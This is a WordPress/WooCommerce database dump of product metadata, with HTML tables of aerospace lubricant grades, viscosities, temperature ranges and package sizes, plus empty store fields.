INSERT INTO `wp_postmeta` VALUES (4865, 648, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4866, 648, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:0:"";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4867, 648, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4868, 648, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4869, 648, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4870, 648, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4871, 648, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4872, 648, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4873, 648, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4874, 648, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4875, 648, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4876, 648, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4877, 648, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4878, 648, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4879, 648, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4880, 648, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4881, 648, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4882, 648, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4883, 648, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4884, 648, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4885, 648, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4886, 648, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4887, 648, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4888, 648, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4889, 648, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4890, 648, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4891, 648, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4892, 648, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4893, 648, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4923, 648, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4924, 648, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4925, 583, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4926, 648, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4927, 649, '_edit_lock', '1475605285:2'); 
INSERT INTO `wp_postmeta` VALUES (4928, 649, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4929, 649, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4930, 649, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4931, 649, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">280AB</td>\r\n<td style="text-align: center;" width="241">280AC</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4932, 649, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4933, 649, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (4934, 649, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4935, 649, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4936, 649, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4937, 649, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4938, 649, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4939, 649, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4940, 649, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4941, 649, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4942, 649, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4943, 649, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4944, 649, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4945, 649, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4946, 649, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4947, 649, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4948, 649, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4949, 649, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4950, 649, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4951, 649, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4952, 649, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4953, 649, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4954, 649, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4955, 649, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4956, 649, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4957, 649, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4958, 649, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4959, 649, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4960, 649, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4961, 649, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4962, 649, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5026, 651, '_edit_lock', '1475016565:2'); 
INSERT INTO `wp_postmeta` VALUES (5027, 651, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5028, 651, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5029, 651, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5030, 651, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">280AB</td>\r\n<td style="text-align: center;" width="241">280AC</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5031, 651, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5032, 651, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5033, 651, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5034, 651, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5035, 651, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5036, 651, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5037, 651, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5038, 651, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5039, 651, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5040, 651, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5041, 651, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5042, 651, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5043, 651, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5044, 651, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5045, 651, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5046, 651, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5047, 651, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5048, 651, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5049, 651, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5050, 651, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5051, 651, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5052, 651, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5053, 651, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5054, 651, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5055, 651, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5056, 651, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5057, 651, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5058, 651, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5059, 651, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5089, 651, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5090, 651, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5091, 652, '_edit_lock', '1475017198:2'); 
INSERT INTO `wp_postmeta` VALUES (5092, 652, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5093, 652, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5094, 652, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5095, 652, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">283AZ</td>\r\n<td style="text-align: center;" width="241">283AA</td>\r\n<td style="text-align: center;" width="213">283AB</td>\r\n<td style="text-align: center;" width="167">283AC</td>\r\n<td width="167">283AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td>1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td>502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td>44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td>(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5096, 652, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5097, 652, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5098, 652, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5099, 652, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5100, 652, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5101, 652, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5102, 652, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5103, 652, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5104, 652, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5105, 652, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5106, 652, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5107, 652, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5108, 652, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5109, 652, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5110, 652, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5111, 652, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5112, 652, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5113, 652, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5114, 652, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5115, 652, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5116, 652, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5117, 652, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5118, 652, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5119, 652, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5120, 652, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5121, 652, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5122, 652, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5123, 652, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5124, 652, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5125, 652, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5126, 652, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5130, 653, '_edit_lock', '1475020616:2'); 
INSERT INTO `wp_postmeta` VALUES (5131, 653, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5132, 653, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5133, 653, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5134, 653, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">283AZ</td>\r\n<td style="text-align: center;" width="241">283AA</td>\r\n<td style="text-align: center;" width="213">283AB</td>\r\n<td style="text-align: center;" width="167">283AC</td>\r\n<td width="167">283AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td>1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td>502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td>44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td>(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5135, 653, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5136, 653, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5137, 653, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5138, 653, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5139, 653, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5140, 653, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5141, 653, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5142, 653, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5143, 653, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5144, 653, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5145, 653, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5146, 653, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5147, 653, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5148, 653, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5149, 653, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5150, 653, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5151, 653, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5152, 653, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5153, 653, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5154, 653, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5155, 653, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5156, 653, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5157, 653, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5158, 653, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5159, 653, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5160, 653, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5161, 653, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5162, 653, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5163, 653, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5193, 653, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5194, 653, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5195, 654, '_edit_lock', '1475016679:2'); 
INSERT INTO `wp_postmeta` VALUES (5196, 654, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5197, 654, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5198, 654, '_stock_status', 'instock'); 
